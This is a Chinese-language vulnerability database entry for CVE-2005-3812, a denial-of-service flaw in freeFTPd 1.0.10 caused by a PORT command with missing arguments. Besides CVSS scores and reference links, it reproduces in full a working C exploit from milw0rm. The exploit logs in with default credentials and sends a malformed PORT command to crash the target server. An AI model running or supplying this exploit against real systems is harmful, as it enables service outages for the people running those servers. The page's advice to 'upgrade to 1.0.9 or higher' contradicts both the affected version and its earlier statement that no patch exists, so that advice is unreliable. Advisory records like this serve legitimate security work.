CVE-2005-3812
CVSS6.8
发布时间 :2005-11-25 21:03:00
修订时间 :2011-03-07 21:27:12
NMCOE    

[原文]freeFTPd 1.0.10 allows remote authenticated users to cause a denial of service (null dereference and crash) via a PORT command with missing arguments.


[CNNVD]FreeFTPD 缺少参数的PORT命令拒绝服务漏洞(CNNVD-200511-401)

        FreeFTPd是一款基于WeOnlyDo FTP/SFTP实现的免费FTP+SSL/SFTP服务器。
        FreeFTPd 1.0.10允许远程经过认证的用户通过一个缺少参数的PORT命令来发起拒绝服务攻击。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3812
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3812
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-401
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2580
(UNKNOWN)  VUPEN  ADV-2005-2580
http://www.securityfocus.com/bid/15557
(UNKNOWN)  BID  15557
http://www.securityfocus.com/archive/1/archive/1/417602/30/0/threaded
(UNKNOWN)  BUGTRAQ  20051124 freeFTPd 1.0.10 (Dos,Exploit)
http://secunia.com/advisories/17737
(VENDOR_ADVISORY)  SECUNIA  17737

- 漏洞信息

FreeFTPD 缺少参数的PORT命令拒绝服务漏洞
中危 其他
2005-11-25 00:00:00 2005-11-28 00:00:00
远程  
        FreeFTPd是一款基于WeOnlyDo FTP/SFTP实现的免费FTP+SSL/SFTP服务器。
        FreeFTPd 1.0.10允许远程经过认证的用户通过一个缺少参数的PORT命令来发起拒绝服务攻击。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://freeftpd.com/

- 漏洞信息 (1339)

FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit (EDBID:1339)
windows dos
2005-11-24 Verified
0 Stefan Lochbihler
[点击下载] [点击下载]
// freeFTPd Denial of Service Attack
// Tested on a Win XP Sp1 Box


#include "stdio.h"
#include "winsock2.h"
#pragma comment (lib,"ws2_32")


#define PORT 21
#define USER "root"
#define PASS "root"
#define L    "--------------------------------------------------"
#define HL   "freeFTPd (1.0.10) DoS Exploit by steve01@chello.at"
#define BOOM "23"

typedef unsigned long ulong;
ulong resolv_host(char *);

int main(int argc, char* argv[])
{

   WSADATA wsa;
   SOCKET s_target;
   struct sockaddr_in addr;
   WORD wsVersion;
   int err=0;

   if(argc<2)
   {
       printf("%s\n",L);
       printf("%s\n",HL);
       printf("%s\n",L);
       printf("Usage: %s <www.target.com>\n",argv[0]);
       exit(0);
   }

   printf("%s\n",L);
   printf("%s\n",HL);
   printf("%s\n",L);


   if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa))
   {
       printf("Error WSAStartup() Error Code: %d\n",WSAGetLastError());
       exit(1);
   }



   s_target=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if(s_target==INVALID_SOCKET)
   {
       printf("Error socket() Error Code: %d\n",WSAGetLastError());
       exit(2);
   }


   addr.sin_family = AF_INET;
   addr.sin_port = htons(PORT);
   addr.sin_addr.s_addr= resolv_host(argv[1]);

   if(connect(s_target,(SOCKADDR *)&addr,sizeof(addr)))
   {
       printf("Error connect() Error Code: %d\n",WSAGetLastError());
       exit(3);
   }

   int recvsize=0;
   char recvbuffer[400];
   char sendbuffer[400];

   //recv banner
   recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
   recvbuffer[recvsize]='\0';
   //send user
   strncpy(sendbuffer,"USER ",sizeof(sendbuffer)-1);
   strncat(sendbuffer,USER,sizeof(sendbuffer)-strlen(sendbuffer)-1);
   strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);

   send(s_target,sendbuffer,strlen(sendbuffer),0);

   //recv user stuff
   recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
   recvbuffer[recvsize]='\0';

   strncpy(sendbuffer,"PASS ",sizeof(sendbuffer)-1);
   strncat(sendbuffer,PASS,sizeof(sendbuffer)-strlen(sendbuffer)-1);
   strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);

   //send pass
   send(s_target,sendbuffer,strlen(sendbuffer),0);

   //recv pass stuff
   recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
   recvbuffer[recvsize]='\0';

   strncpy(sendbuffer,"PORT ",sizeof(sendbuffer)-1);
   strncat(sendbuffer,BOOM,sizeof(sendbuffer)-strlen(sendbuffer)-1);
   strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);
   send(s_target,sendbuffer,strlen(sendbuffer),0);


   closesocket(s_target);
   WSACleanup();



   return 0;
}


ulong resolv_host(char *host)
{

ulong uhost=0;
struct hostent *th;

uhost=inet_addr(host);
if(uhost==INADDR_NONE)
{
 th=gethostbyname(host);
 if(!th)
 {
   printf("Check if %s is up \n",host);
   exit(0);
 }

 uhost=*(unsigned long*)th->h_addr;

}



return uhost;


}

// milw0rm.com [2005-11-24]
		

- 漏洞信息

21108
freeFTPd Multiple Command Malformed Argument Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-11-24 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.0.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站